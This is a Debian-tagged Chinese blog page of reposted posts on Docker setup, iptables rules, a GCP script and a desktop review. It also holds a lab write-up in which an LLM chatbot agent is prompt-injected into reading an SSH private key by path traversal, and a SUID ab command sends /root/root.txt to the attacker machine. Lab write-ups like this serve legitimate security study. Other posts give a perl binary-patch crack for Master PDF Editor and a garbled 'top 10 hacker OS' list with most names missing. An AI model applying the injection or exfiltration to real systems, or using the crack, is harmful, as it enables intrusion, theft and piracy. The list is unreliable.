标签 debian 下的文章

早上一到公司,例行远程 rdp 家里虚拟 windows ,发现进不去了。
查看探针,果然家里 ESXi 下面的两台虚拟 debian 都处于失联状态。
早上老婆吩咐我把家里电脑打开,她上午准备在家办公。我把电脑打开后就上班去了。
我打电话回去,问她家里的网络怎么了。
她说家里冷,就把取暖器插到一个空闲的三芯插座上去,结果 UPS 嘀嘀叫起来了,她就慌忙把绿色的闪烁按钮按了一下,ups 就不叫了,就这么一回事。
我查了一下,BK650M2 ups 功率最大 390W ,艾美特踢脚线取暖器 HD22-R41U 功率 2200W ,把这么大功率的电器插到我 ups 上面,还手动关了 ups 电源,我正在运行的 ESXi 咋办,里面跑的虚拟机还不瞬间灰飞烟灭?
欲哭无泪,女人真可怕。

一、Debian 安装 Docker 1. 更新并安装一些必要系统工具。


sudo apt-get update

sudo apt-get upgrade

sudo apt-get install \\
	apt-transport-https \\
	software-properties-common \\
    ca-certificates \\
    curl \\
    gnupg \\
    lsb-release 

2. 安装 GPG 证书。

curl -fsSL <https://mirrors.aliyun.com/docker-ce/linux/debian/gpg> | apt-key add -

3. 写入软件源信息。

add-apt-repository "deb [arch=amd64] <https://mirrors.tuna.tsinghua.edu.cn/docker-ce/linux/debian> $(lsb_release -cs) stable" 

4. 更新并安装社区版 Docker-ce

sudo apt-get update

sudo apt-get install -y docker-ce docker-ce-cli containerd.io docker-compose-plugin

二、配置开机自启

1. 开机自启

sudo systemctl enable docker

2. 启动

sudo systemctl start docker


📌 转载信息
原作者:
FAT64
转载时间:
2026/1/24 16:04:31

使用前提:
有域名,1panel 面板,debian 系统

我是小主机安装的 debian,想实现局域网内访问和外网使用泛域名访问
因为自带的映射一次只能设置一个 ip,而且 1panel 自带的防火墙和 DOCKER-USER 链平级,无法直接在 1panel 里设置防火墙影响容器端口的开放

教程开始:
前置 配置泛域名的方法

这两天在更新

第一步 查询当前 docker 使用 iptables 版本

echo "------ 账本 A: iptables-legacy (旧版) ------"
iptables-legacy -t nat -S DOCKER 2>/dev/null || echo "Legacy 中没有 DOCKER 链" echo "" echo "------ 账本 B: iptables-nft (新版/默认) ------"
iptables-nft -t nat -S DOCKER 2>/dev/null || echo "NFT 中没有 DOCKER 链" 

需要 debian 系统和 docker 使用同一版本,debian 新版基本上是 nft

第二步 添加 ipv6 和 ipv4 规程
局域网网段请自行更改
1panel 面板自带的反向代理是容器运行,所以需要额外开放 80 和 443
ipv4:

# 清空现有规则,重新排列
iptables -F DOCKER-USER

# 1. 基础规则:允许已建立连接、本机、局域网
iptables -A DOCKER-USER -m state --state RELATED,ESTABLISHED -j ACCEPT
iptables -A DOCKER-USER -i lo -j ACCEPT
iptables -A DOCKER-USER -s 192.168.5.0/24 -j ACCEPT

# 2. 【新增】特赦反向代理端口 (允许外网访问 Docker 的 80443)
# 只有这样,外网流量才能到达你的 Nginx 容器
iptables -A DOCKER-USER -p tcp -m tcp --dport 80 -j ACCEPT
iptables -A DOCKER-USER -p tcp -m tcp --dport 443 -j ACCEPT

# 3. 拒绝外网网卡的其他所有流量
# (把 enp1s0 换成你的实际网卡名,如果不确定就用 ! -i lo 表示非回环)
iptables -A DOCKER-USER -i enp1s0 -j DROP

# 4. 默认返回
iptables -A DOCKER-USER -j RETURN

ipv6:

ip6tables -F DOCKER-USER

# 1. 基础规则
ip6tables -A DOCKER-USER -m state --state RELATED,ESTABLISHED -j ACCEPT
ip6tables -A DOCKER-USER -i lo -j ACCEPT
ip6tables -A DOCKER-USER -s fe80::/10 -j ACCEPT

# 2. 【新增】特赦 IPv6 下的 80443
ip6tables -A DOCKER-USER -p tcp -m tcp --dport 80 -j ACCEPT
ip6tables -A DOCKER-USER -p tcp -m tcp --dport 443 -j ACCEPT

# 3. 拒绝外网网卡的其他 IPv6 流量
ip6tables -A DOCKER-USER -i enp1s0 -j DROP

# 4. 默认返回
ip6tables -A DOCKER-USER -j RETURN 

完成后再次测试即可


📌 转载信息
原作者:
ak7876
转载时间:
2026/1/20 17:39:49

The Hackers Labs-Securitrona 前言 本文档记录了针对The Hackers Labs平台Securitrona靶机的渗透测试全过程,涉及的漏洞类型:LLM提示词注入、路径遍历、SUID权限滥用。目标系统为运行Debian 12的Linux主机,部署了基于Node.js的LLM聊天机器人应用,该应用集成了文件系统操作工具(read_file、write_file、list_files)。测试过程中发现的主要漏洞包括:LLM Agent工具调用层面的路径遍历漏洞,允许通过构造恶意filepath参数读取任意系统文件;SSH私钥使用弱口令保护,可通过字典攻击在合理时间内破解;系统存在SUID权限配置不当,/usr/bin/ab被赋予SUID位,可被利用读取特权文件。攻击链路为:网络侦察(ARP扫描、Nmap端口扫描与服务识别)→ Web应用分析(识别3000端口LLM服务)→ 提示词注入攻击(诱导AI泄露工具信息并执行路径遍历)→ 敏感信息窃取(获取~/.ssh/id_rsa)→ 离线密码破解(ssh2john + John the Ripper)→ SSH远程登录 → SUID提权(ab命令文件外传)。测试环境:攻击机Kali Linux(192.168.56.130),目标机Securitrona(192.168.56.144),网络环境为VirtualBox Host-Only网络。 主机发现

(base) ┌──(root㉿zss)-[/home/zss/桌面]
└─# sudo arp-scan -I eth1 -l
Interface: eth1, type: EN10MB, MAC: 00:0c:29:f0:fb:8a, IPv4: 192.168.56.130
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1 0a:00:27:00:00:0c (Unknown: locally administered)
192.168.56.100 08:00:27:5a:74:44 PCS Systemtechnik GmbH
192.168.56.144 08:00:27:93:0d:e5 PCS Systemtechnik GmbH

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.063 seconds (124.09 hosts/sec). 3 responded

端口扫描

(base) ┌──(root㉿zss)-[/home/zss/桌面]
└─# nmap -p- --open -Pn -n --min-rate 10000 192.168.56.144 -oN ports.txt
Starting Nmap 7.98 ( https://nmap.org ) at 2026-01-13 15:14 +0800
Nmap scan report for 192.168.56.144
Host is up (0.00044s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3000/tcp open ppp
MAC Address: 08:00:27:93:0D:E5 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 2.56 seconds
(base) ┌──(root㉿zss)-[/home/zss/桌面]
└─# nmap -p 22,80,3000 -sCV -Pn -n 192.168.56.144
Starting Nmap 7.98 ( https://nmap.org ) at 2026-01-13 15:14 +0800
Nmap scan report for 192.168.56.144
Host is up (0.00047s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u6 (protocol 2.0)
| ssh-hostkey:
| 256 c0:14:af:ad:a9:67:50:e3:9a:23:d9:29:2e:14:ec:42 (ECDSA)
|_ 256 fa:a3:d3:9b:df:ba:58:49:9e:5d:54:d4:fa:e8:36:bf (ED25519)
80/tcp open http Apache httpd 2.4.62 ((Debian))
|_http-title: SECURITRONA - Hacker Cibern\xC3\xA9tica
|_http-server-header: Apache/2.4.62 (Debian)
3000/tcp open ppp?
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 200 OK
| X-Content-Type-Options: nosniff
| X-Frame-Options: DENY
| X-XSS-Protection: 1; mode=block
| Referrer-Policy: strict-origin-when-cross-origin
| Accept-Ranges: bytes
| Cache-Control: public, max-age=0
| Last-Modified: Thu, 26 Jun 2025 23:03:48 GMT
| ETag: W/"fa7-197ae7ba420"
| Content-Type: text/html; charset=UTF-8
| Content-Length: 4007
| Date: Tue, 13 Jan 2026 07:15:03 GMT
| Connection: close
| <!DOCTYPE html>
| <html lang="es">
| <head>
| <meta charset="UTF-8">
| <meta name="viewport" content="width=device-width, initial-scale=1.0">
| <title>Securitrona - Black Hacker Peligrosa</title>

| <link rel="stylesheet" href="styles.css">
| <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0/css/all.min.css" rel="stylesheet">
| <script src="/socket.io/socket.io.js"></script>

| <script src="https://cdn.jsdelivr.net/npm/marked/marked.min.js"></script>

| </head>

| <bod
| HTTPOptions, RTSPRequest:
| HTTP/1.1 404 Not Found
| X-Content-Type-Options: nosniff
| X-Frame-Options: DENY
| X-XSS-Protection: 1; mode=block
| Referrer-Policy: strict-origin-when-cross-origin
| Content-Type: application/json; charset=utf-8
| Content-Length: 30
| ETag: W/"1e-vhoou9sM6XmJtOZWC9/edTTWHh8"
| Date: Tue, 13 Jan 2026 07:15:04 GMT
| Connection: close
| {"error":"Ruta no encontrada"}
| Help, NCP:
| HTTP/1.1 400 Bad Request
|_ Connection: close
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3000-TCP:V=7.98%I=7%D=1/13%Time=6965F0FD%P=x86_64-pc-linux-gnu%r(Ge
SF:tRequest,113C,"HTTP/1\.1\x20200\x20OK\r\nX-Content-Type-Options:\x20nos
SF:niff\r\nX-Frame-Options:\x20DENY\r\nX-XSS-Protection:\x201;\x20mode=blo
SF:ck\r\nReferrer-Policy:\x20strict-origin-when-cross-origin\r\nAccept-Ran
SF:ges:\x20bytes\r\nCache-Control:\x20public,\x20max-age=0\r\nLast-Modifie
SF:d:\x20Thu,\x2026\x20Jun\x202025\x2023:03:48\x20GMT\r\nETag:\x20W/\"fa7-
SF:197ae7ba420\"\r\nContent-Type:\x20text/html;\x20charset=UTF-8\r\nConten
SF:t-Length:\x204007\r\nDate:\x20Tue,\x2013\x20Jan\x202026\x2007:15:03\x20
SF:GMT\r\nConnection:\x20close\r\n\r\n<!DOCTYPE\x20html>\n<html\x20lang=\"
SF:es\">\n<head>\n\x20\x20\x20\x20<meta\x20charset=\"UTF-8\">\n\x20\x20\x2
SF:0\x20<meta\x20name=\"viewport\"\x20content=\"width=device-width,\x20ini
SF:tial-scale=1\.0\">\n\x20\x20\x20\x20<title>Securitrona\x20-\x20Black\x2
SF:0Hacker\x20Peligrosa</title>\n\x20\x20\x20\x20<link\x20rel=\"stylesheet
SF:\"\x20href=\"styles\.css\">\n\x20\x20\x20\x20<link\x20href=\"https://cd
SF:njs\.cloudflare\.com/ajax/libs/font-awesome/6\.0\.0/css/all\.min\.css\"
SF:\x20rel=\"stylesheet\">\n\x20\x20\x20\x20<script\x20src=\"/socket\.io/s
SF:ocket\.io\.js\"></script>\n\x20\x20\x20\x20<script\x20src=\"https://cdn
SF:\.jsdelivr\.net/npm/marked/marked\.min\.js\"></script>\n</head>\n<bod")
SF:%r(Help,2F,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x20close\
SF:r\n\r\n")%r(NCP,2F,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x
SF:20close\r\n\r\n")%r(HTTPOptions,168,"HTTP/1\.1\x20404\x20Not\x20Found\r
SF:\nX-Content-Type-Options:\x20nosniff\r\nX-Frame-Options:\x20DENY\r\nX-X
SF:SS-Protection:\x201;\x20mode=block\r\nReferrer-Policy:\x20strict-origin
SF:-when-cross-origin\r\nContent-Type:\x20application/json;\x20charset=utf
SF:-8\r\nContent-Length:\x2030\r\nETag:\x20W/\"1e-vhoou9sM6XmJtOZWC9/edTTW
SF:Hh8\"\r\nDate:\x20Tue,\x2013\x20Jan\x202026\x2007:15:04\x20GMT\r\nConne
SF:ction:\x20close\r\n\r\n{\"error\":\"Ruta\x20no\x20encontrada\"}")%r(RTS
SF:PRequest,168,"HTTP/1\.1\x20404\x20Not\x20Found\r\nX-Content-Type-Option
SF:s:\x20nosniff\r\nX-Frame-Options:\x20DENY\r\nX-XSS-Protection:\x201;\x2
SF:0mode=block\r\nReferrer-Policy:\x20strict-origin-when-cross-origin\r\nC
SF:ontent-Type:\x20application/json;\x20charset=utf-8\r\nContent-Length:\x
SF:2030\r\nETag:\x20W/\"1e-vhoou9sM6XmJtOZWC9/edTTWHh8\"\r\nDate:\x20Tue,\
SF:x2013\x20Jan\x202026\x2007:15:04\x20GMT\r\nConnection:\x20close\r\n\r\n
SF:{\"error\":\"Ruta\x20no\x20encontrada\"}");
MAC Address: 08:00:27:93:0D:E5 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.42 seconds

发现三个开放端口: 22/SSH: OpenSSH服务 80/HTTP: Apache Web服务器 3000/HTTP: 未知Web应用 访问80端口发现是一个关于"Securitrona"的介绍页面,包含大量LLM工具和扩展的参考链接。 LLM提示词注入 访问 http://192.168.56.144:3000/ 发现一个聊天机器人界面: 左侧是与AI对话的聊天窗口 右侧是文件列表,可以下载部分文件 AI自称"Securitrona",是一个"黑帽黑客"角色

LLM Agent通常会配备一些工具(Tools)来执行特定任务。我们可以直接询问AI它有哪些可用工具: Prompt:

AI响应揭示了三个工具:

工具名称
功能
参数
read_file
读取文件内容
filepath: 文件路径
write_file
写入文件内容
filepath: 文件路径,content: 内容
list_files
列出files目录内容
无参数

这些工具是AI代理与文件系统交互的接口,也是潜在的攻击面。 read_file工具存在路径遍历漏洞: 该工具没有正确验证输入的文件路径 没有对可访问的目录进行适当隔离 允许使用../进行目录遍历 首先,我们可以尝试读取一个不存在的文件来触发错误,从而泄露服务器路径: Prompt:

错误信息会泄露files目录的完整路径,例如:

这告诉我们: 用户名是 securitrona 应用位于 /home/securitrona/chatbot/ files目录是 /home/securitrona/chatbot/files/ 知道了用户名和目录结构,我们可以尝试读取SSH私钥: Prompt(关键攻击载荷):

路径解析:

AI响应中的私钥可能会被截断显示。有几种方法获取完整内容: 通过WebSocket获取 抓包

整理一下

私钥爆破 获取的私钥是加密的,需要passphrase才能使用。 设置正确权限,转换为John格式,使用John破解

SSH连接

提权

发现: /usr/bin/ab 具有SUID权限 ab(Apache Benchmark)是Apache HTTP服务器的性能测试工具。 根据GTFOBins,当ab具有SUID权限时,可以用于: 读取特权文件(通过POST请求发送文件内容) 无法直接提权到root shell 在攻击机上设置监听

在目标机上使用ab发送root flag

参数说明: -p: 指定要POST的文件 /root/root.txt: 要读取的特权文件 http://攻击机IP:8000/onepath: 接收数据的地址 nc会收到包含root flag的POST请求内容。

总结 本次渗透测试成功获取了目标系统的root flag,完整攻击路径如下:通过arp-scan发现目标主机192.168.56.144,Nmap扫描识别出22/tcp(OpenSSH 9.2p1)、80/tcp(Apache 2.4.62)、3000/tcp(Node.js Web应用)三个开放端口。3000端口运行的LLM聊天机器人存在提示词注入漏洞,通过构造西班牙语提示词成功获取AI的工具列表,确认其具备read_file、write_file、list_files三个文件操作工具。read_file工具未对filepath参数进行路径规范化处理,存在目录遍历漏洞,通过发送../../.ssh/id_rsa作为filepath参数,成功读取用户securitrona的SSH私钥。私钥采用aes256-ctr加密,使用ssh2john提取哈希后,通过John the Ripper配合rockyou.txt字典破解得到passphrase为147852369。使用该私钥成功SSH登录目标系统获取user shell。本地提权阶段,通过find / -perm -4000枚举SUID文件,发现/usr/bin/ab具有SUID权限。利用ab的-p参数可指定POST请求体文件的特性,执行ab -p /root/root.txt http://192.168.56.130:8000/将root.txt内容外传至攻击机监听端口,成功获取root flag。

提前叠甲:如果出现免费策略修改、被黑客攻破服务器等特殊情况,还是可能被反撸的,所以尽可能绑定虚拟卡。

服务器配置为:1 核 1G 内存 30G 硬盘,入站无限流量,出站 200G 流量(部分 CDN IP 收费)

gcp 处于试用赠金、付费状态可以使用该脚本。
打开 https://console.cloud.google.com/


执行以下命令即可启动该脚本

git clone https://github.com/fatekey/gcp_free && cd gcp_free && bash start.sh

1. 新建免费实例

有 3 个可选地区,推荐的地区在美西,延迟会低一些,不过最难刷出 AMD。
目前只做了新建 Ubuntu 和 Debian 的选项,且部分功能只支持 Debian,故推荐选择 Debian 。

3. 刷 AMD CPU

这个功能我没有怎么测试过,但应该可用,现在美西应该基本刷不出来 AMD 了,而且刷出来提升不到 10%,不建议刷。

4. 配置防火墙规则

可以配置两个规则,一个用于放通所有入站,一个屏蔽所有收费 CDN (Akamai Cloudflare Fastly)IP 防止消耗费用。
除非你用的赠金或者不介意几美分的费用,否则建议开启第二个。

5. Debian 换源

默认源用了 CDN,如果屏蔽了 CDN 就用不了,这个选项可以换成美国没套 CDN 的源。

6. 安装 dae

安装 dae 作为代理软件来访问 CDN IP。

简单解释下,如果前面防火墙规则屏蔽了 cdn ip,那套了 cdn 的网站你就访问不了了,比如 chatgpt,装 dae 相当于装 clash(不过 linux 服务器场景下 dae 更好用),你可以给它配置代理来访问这些 ip。
如果你只是搭建网站、搭建代理(不推荐,或者只推荐做落地分流,因为线路不行,cdn 还被屏蔽了),不管 dae 也行。

7. 配置 dae

需要自行修改 config.dae 添加代理。
如果没有美国服务器搭建 socks 代理,还有两个不错的方案:

  1. 注册 webshare、oxylabs 用免费的 socks 代理,缺点就是只要几 G。
  2. 使用 cf 搭建代理,优选域名使用 proxyip.us.cmliussss.net 即可搭建不通过 cf ip 连接的 cf 代理。

8. 流量监控脚本

一共 200 G 免费流量,使用这个会在用到 180 G 时进行限制,有两种方案,一种是流量到了就关机,然后你可以下个月一号再开机(只要开机就重置流量记录)。另一种是流量到了就屏蔽 ssh 之外的全部入站,下个月一号自动重置流量记录。

9. 删除资源

可以删掉免费机器,换个地区再搭建。


📌 转载信息
原作者:
fatekey
转载时间:
2026/1/16 12:29:17

如题,把主力机

System Details Report


Report details

  • Date generated: 2026-01-07 23:36:43

Hardware Information:

  • Hardware Model: MECHREVO Z2 Air Series GK5CP5X
  • Memory: 32.0 GiB
  • Processor: Intel® Core™ i7-9750H × 12
  • Graphics: Intel® UHD Graphics 630 (CFL GT2)
  • Graphics 1: NVIDIA GeForce GTX 1650
  • Disk Capacity: 1.0 TB

Software Information:

  • Firmware Version: N.1.05
  • OS Name: Debian GNU/Linux 13 (trixie)
  • OS Build: (null)
  • OS Type: 64-bit
  • GNOME Version: 48
  • Windowing System: X11
  • Kernel Version: Linux 6.12.57+deb13-amd64


从 Windows 换成了 Debian,开始非常麻烦啊,先用 ventoy 引导但是有问题,软件安装不上;又是手欠,“把家拆了”,配环境的时候直接把根目录炸了,只能再重装一次。
谈谈遇到的几个选择点:

  1. 对于桌面的选择:

作为一个 “UI 至上” 的用户,我尝试了几个桌面环境:

  1. Gnome 48:最终选择
  • 优点:现代、简洁、动画流畅,扩展生态系统丰富
  • 痛点:资源占用相对较高(在 32GB 内存的机器上不是问题)
  • 决定性因素:自带 RDP 支持,远程访问无缝
  1. Xfce:轻量但不够精致
  • 适合老机器,但视觉风格感觉停留在 2000 年代初期
  • 定制性强,但需要投入大量时间才能达到满意的视觉效果

从 Windows 的 “功能堆砌” 到 Gnome 的 “极简主义”。最初不习惯顶部栏的设计,但习惯了 “活动概览”(Super 键)后,发现工作效率更高了。

  1. 对于显卡的适配性:

NVIDIA + Intel 的配置之路
我的配置是 Intel UHD 630(核显) + NVIDIA GTX 1650(独显),配置过程:

驱动安装:使用 non-free 仓库的 nvidia-driver 包,比从 NVIDIA 官网下载.run 文件简单稳定
Prime 选择:prime-select 工具让切换变得简单,但需要注销重新登录
实际体验:
日常使用:Intel 核显,省电且发热小
游戏 / 渲染:使用 prime-run 前缀启动程序
痛点:某些应用不会自动使用独显,需要手动配置
利用率低的真相:Linux 上的游戏生态依然主要依赖 Proton(Steam Play),原生支持的游戏少。我的 GTX 1650 大部分时间在 “休息”,但对于支持的游戏,性能基本达到 Windows 的 85-90%。

  1. 对于操作性和互动性:
  1. 软件安装的范式转换
  • Windows 思维:下载.exe → 安装 → 可能带全家桶
  • Linux 思维sudo apt install → 系统级管理 → 干净卸载
  • 惊喜apt 的依赖解析虽然有时令人头疼,但卸载时的干净程度令人感动
  1. 终端
  • 最初尽量避免使用终端
  • 现在:终端是最高效的工具,特别是系统管理和批量操作
  • 最喜欢的命令apt history(查看安装历史)、systemctl(服务管理)
  1. 文件系统的重新认识
  • 从 Windows 的 C/D/E 盘到 Linux 的单一树状结构
  • /home/用户名/ 成为了新的 “我的文档”,但更灵活
  • 习惯改变:现在更多使用符号链接(ln -s)组织文件
  1. 对于依赖的一些吐槽:

尝试过的方案:

  1. 搜狗输入法:有 Linux 版,但在我这里频繁崩溃
  2. Google 输入法:安装复杂,依赖多,最终放弃
  3. Fcitx5 + Rime:最终选择
  • 优点:稳定、可定制、资源占用低
  • 配置复杂度:中等,需要编辑 YAML 配置文件
  • 美丽之处:一次配置,终生受益,同步也方便

依赖问题的本质:Linux 软件像精密仪器,每个零件都有特定版本要求。我的经验:

  • 优先使用官方仓库
  • 其次考虑 Flatpak(沙盒隔离,不干扰系统)
  • .deb 包是最后的选择
  • 永远不要 sudo dpkg -i --force-all(血的教训)

最后呢有一个心得体会:Linux 不是 Windows 的替代品,它是另一种思考计算机的方式。一旦你理解了这种方式,就再也回不去了。


📌 转载信息
转载时间:
2026/1/8 10:23:33

linux 系统下的这个学习版的 PDF 编辑工具,有需要的可以一块学习

适用环境:Debian 系
已测试环境:Ubuntu24.04/Xubuntu24.04

下载及安装

wget https://code-industry.net/public/master-pdf-editor-5.9.35-qt5.x86_64.deb

sudo apt install -y ./master-pdf-editor-5.9.35-qt5.x86_64.deb

石皮解方法

# 在001b7b70处,将88替换成FE sudo perl -pi -e 's/(\xE8...\xFF)\x88(..\xBF\x30)/$1\xFE$2/g' /opt/master-pdf-editor-5/masterpdfeditor5

就可以见证奇迹了


📌 转载信息
原作者:
Randy
转载时间:
2026/1/1 15:52:02

  工欲善其事必先利其器,这是一个关于十大黑客最佳操作平台的综合文章。

  在本文中,包括公德黑客运用的10个绝佳操作平台。每一个都是免费的,基于于Linux位,并且与许多黑客工具一起打包。

  10.

  |IMG

  是一个渗透检测的发行版的Linux从全球受到了最流行的免费的操作平台无法为黑客,的2017黑客入侵工具包,和周遭的工作GNOME经典图形桌面状态。

  该为大概3GB的镜象DVDISO画质,是基于的发行及自起动运行光碟,其传统在于一套用于网路渗透检测的实用软件虽然它与非常相像,但并不完全相似。采用了GNOME桌面。

  致力于必须执行渗透检测操作的安全学者视频培训脚本,的工作框架大部份包括了五分类软件,这些工具早已在菜单包括五个类别归纳整理。

  下载

  9.

  2017黑客入侵工具包

  |IMG

  是一个基于的开放源码渗透检测Linux发行版,它借助存档进行升级。它包含300多个渗透检测软件,另外还包含进行广泛操作所需的基本管理硬件。

  下载

  8.HAWKLINUX

  截图|IMG:

  HawkLinux被视为常识解决方案有限公司(PvtLtd.)生产的最非凡黑客技术,最有效和全面的基于的渗入测试Linux分散技术。专用于700多种适于渗透检测仪的软件,以及300多种适于多功用安全的器材和蓄意软件调查。

  HawkLinux是为白围巾黑客和渗入测试者设计的基于(Linux)的Linux发行版操作平台。Hawk可以适于网络安全和会计或者数字取证。它还包括多种软件,适合于联通安全和无线网路安全检测。

  下载HAWKLINUX

  7.ARCHLINUX

  ArchLinuxIMG:

  ArchLinux绝对是免费和开放源代码软件,并支持社区参加。

  ArchLinux是通用x86/64GNU/Linux发行版。Arch采用滚动更新机制,尽大力提供最新的稳固版硬件。初始安装的Arch只是一个基本平台,随后客户可以按照自己的偏好安装必须的硬件并配置成合乎自己梦想的平台.

  下载ArchLinux

  6.(NST)

  NST|iMG

  网络安全软件包(NST)是一个可鼓励的即用(live)CD,基于Core。这个软件包设计用来方便访问最棒的开源网路安全应用,主要运行在x86系统上。开发这个网路安全软件包的主要目的是为网路安全管控人员提供一套完备的开源网路安全软件。

  NST最奇特的地方是可以将大多数x86机器(奔腾2及以上)转化成一台可以适于网络流量预测、入侵测试、网络数据包生成、无线网路监视的虚拟服务器,当然它也可以当作一套复杂的网路/主机扫描器来使用。

  下载

  5.WEB

  武士网络测试|IMG:博客

  Web测试框架从根本上集中在检测Web应用程序的安全性,并牵涉Web评估和误用设备的负载。建立“武士网络测试框架”的功绩来自于Kevin,和Frank。“武士框架”为公德黑客和面试者提供了一个即时Linux条件,该条件预先配置为再次运行成为虚拟机执行Web渗透检测。

  武士Web测试框架结合了众所周知的检测器材,如和ance,和适于映射,w3af和Burp的启迪,以及BeEF和的研发。结构依赖于9.04,是完全开源的,并斩获关于工程的正常升级。

  下载WEB

  4.

  IMG

  是一个基于Unix的工作框架,根据由RedHat公司支持的由支持的组创立的Linux和GNU程序(Linux发行版)。

  包括的程序分散在不同的免费和开放源代码许可证下,并计划变成这种科技的主要优势。是RedHatLinux发行版的附属产品。

  下载

  3.

  IMG

  OS是面向安全的操作平台,它被设计为适于渗透检测、计算机取证、反向工程、攻击、云计算渗透检测、隐私/匿名、密码等场合。该发行基于,其传统在于MATE桌面环境,并由研发。

  操作平台运用Kali存档进行各类捆绑更新并协调新的软件。为PC框架审查员提供一个简略易用的GUI和重量级条件,发挥广泛的法律科学,弱点评估和加密。这个操作平台是十分适于定制化。

  下载操作平台

  2.

  LinuxIMG

  是一个基于的Linux发行版,用于在安全检测中帮助道德黑客和渗入测试员工。操作平台的目标是更迅速,更有效地运行并具备可忽视桌面的状况。的主要优势在于,它自己的特定软件内存在正常的时间间隔内进行升级2017黑客入侵工具包,以维持颜色的稳固和流行。

  分散包括从Web测试和平台调查到拉伸测试,嗅探,安全检测,犯罪现场调查和研发的70多种软件。

  下载

  1.KALILINUX

  KaliLinux|

  最先进的渗入测试平台。KaliLinux也是一个旨在于小软件(称为KaliLinux)应用。

  由Ltd维护和支助。最先由的Mati和Devon通过重写来完成,是她们之前写的适于取证的Linux发行版。

  最流行的kaliLinux软件

  Nmap,-ng,,,框架,Burp套件,John培训脚本,社会项目软件包,,,OWASPZAP

  下载KALILINUX